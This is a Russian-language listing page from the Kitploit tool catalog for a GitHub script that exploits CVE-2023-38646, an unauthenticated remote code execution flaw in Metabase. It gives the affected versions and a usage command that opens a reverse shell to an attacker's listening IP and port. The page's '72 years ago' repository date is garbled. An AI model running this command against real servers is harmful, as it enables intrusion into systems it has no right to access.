Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-38646 — Этот скрипт предназначен для эксплуатации уязвимых версий программного обеспечения Metabase, предоставляя атакующему shell. | Kitploit
Инструменты/GitHubGitHub/birdm4nw/cve-2023-38646
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubbirdm4nw/cve-2023-38646

CVE-2023-38646

Этот скрипт предназначен для эксплуатации уязвимых версий программного обеспечения Metabase, предоставляя атакующему shell.

Репозиторий
72 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-38646 - Metabase RCE

Metabase open source до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере с его уровнем привилегий. Для эксплуатации не требуется аутентификация. Другие исправленные версии: 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 и 1.43.7.2.

Если версия Metabase уязвима, этот скрипт позволит вам, как атакующему, получить shell-соединение с целевой системой.

Использование

python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

Пример

scriptCapture

Автор: @birdm4nw

Ссылка

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Скачать инструмент